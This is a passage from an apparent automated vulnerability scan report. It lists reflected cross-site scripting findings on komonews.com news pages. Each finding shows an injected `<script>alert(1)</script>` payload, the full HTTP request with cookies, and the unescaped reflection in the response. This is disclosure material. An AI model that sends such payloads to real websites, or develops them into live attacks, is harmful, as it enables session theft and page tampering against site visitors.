<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Snow begin
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116727124.html?7249e"><script>alert(1)</script>3476c1f423c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.15. http://www.komonews.com/news/boeing/116707614.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/boeing/116707614.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6391"><script>alert(1)</script>5ee4a5ffd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/boeing/116707614.html?e6391"><script>alert(1)</script>5ee4a5ffd14=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59072

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Aircraft t
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/boeing/116707614.html?e6391"><script>alert(1)</script>5ee4a5ffd14=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.16. http://www.komonews.com/news/business/116735244.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/business/116735244.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e305c"><script>alert(1)</script>26818fe7053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116735244.html?e305c"><script>alert(1)</script>26818fe7053=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Foreclosur
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116735244.html?e305c"><script>alert(1)</script>26818fe7053=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.17. http://www.komonews.com/news/business/116739564.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/business/116739564.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdbc4"><script>alert(1)</script>be01c09fb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116739564.html?fdbc4"><script>alert(1)</script>be01c09fb7=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Top SEC la
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116739564.html?fdbc4"><script>alert(1)</script>be01c09fb7=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.18. http://www.komonews.com/news/business/116739939.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/business/116739939.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99328"><script>alert(1)</script>147a401db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116739939.html?99328"><script>alert(1)</script>147a401db4e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   HP shares
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116739939.html?99328"><script>alert(1)</script>147a401db4e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.19. http://www.komonews.com/news/business/116740159.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/business/116740159.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b05d"><script>alert(1)</script>15b6b16a6d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116740159.html?6b05d"><script>alert(1)</script>15b6b16a6d7=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55979

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Fidelity:
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116740159.html?6b05d"><script>alert(1)</script>15b6b16a6d7=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.20. http://www.komonews.com/news/business/116740389.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/business/116740389.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9bd1"><script>alert(1)</script>5502d67dd02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/business/116740389.html?d9bd1"><script>alert(1)</script>5502d67dd02=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54978

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   FDIC says
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/business/116740389.html?d9bd1"><script>alert(1)</script>5502d67dd02=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.21. http://www.komonews.com/news/consumer/116673109.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/consumer/116673109.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e470e"><script>alert(1)</script>85c862ec889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/consumer/116673109.html?e470e"><script>alert(1)</script>85c862ec889=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55034

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Not too la
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/consumer/116673109.html?e470e"><script>alert(1)</script>85c862ec889=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.22. http://www.komonews.com/news/consumer/116704069.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/consumer/116704069.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299af"><script>alert(1)</script>0d1f4bdf7a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/consumer/116704069.html?299af"><script>alert(1)</script>0d1f4bdf7a1=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54318

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Your credi
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/consumer/116704069.html?299af"><script>alert(1)</script>0d1f4bdf7a1=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.23. http://www.komonews.com/news/entertainment/116123569.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116123569.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24b06"><script>alert(1)</script>51dacf53101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116123569.html?24b06"><script>alert(1)</script>51dacf53101=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 40669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Photo gall
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116123569.html?24b06"><script>alert(1)</script>51dacf53101=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.24. http://www.komonews.com/news/entertainment/116189709.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116189709.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14dd"><script>alert(1)</script>cf3829b5cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116189709.html?d14dd"><script>alert(1)</script>cf3829b5cae=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56794

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Earth to J
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116189709.html?d14dd"><script>alert(1)</script>cf3829b5cae=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.25. http://www.komonews.com/news/entertainment/116665019.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116665019.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f03"><script>alert(1)</script>7c279062389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116665019.html?b6f03"><script>alert(1)</script>7c279062389=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Bieber fan
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116665019.html?b6f03"><script>alert(1)</script>7c279062389=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.26. http://www.komonews.com/news/entertainment/116680394.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116680394.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4a4"><script>alert(1)</script>464baf18d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116680394.html?fd4a4"><script>alert(1)</script>464baf18d3a=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Singer Buj
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116680394.html?fd4a4"><script>alert(1)</script>464baf18d3a=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.27. http://www.komonews.com/news/entertainment/116692424.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116692424.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb27"><script>alert(1)</script>91a41cb9407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116692424.html?5fb27"><script>alert(1)</script>91a41cb9407=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54160

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Chris Brow
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116692424.html?5fb27"><script>alert(1)</script>91a41cb9407=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.28. http://www.komonews.com/news/entertainment/116704174.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/entertainment/116704174.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f4"><script>alert(1)</script>6d803cea48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116704174.html?da2f4"><script>alert(1)</script>6d803cea48f=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53896

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   O'Donnell
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116704174.html?da2f4"><script>alert(1)</script>6d803cea48f=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.29. http://www.komonews.com/news/entertainment/116707059.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
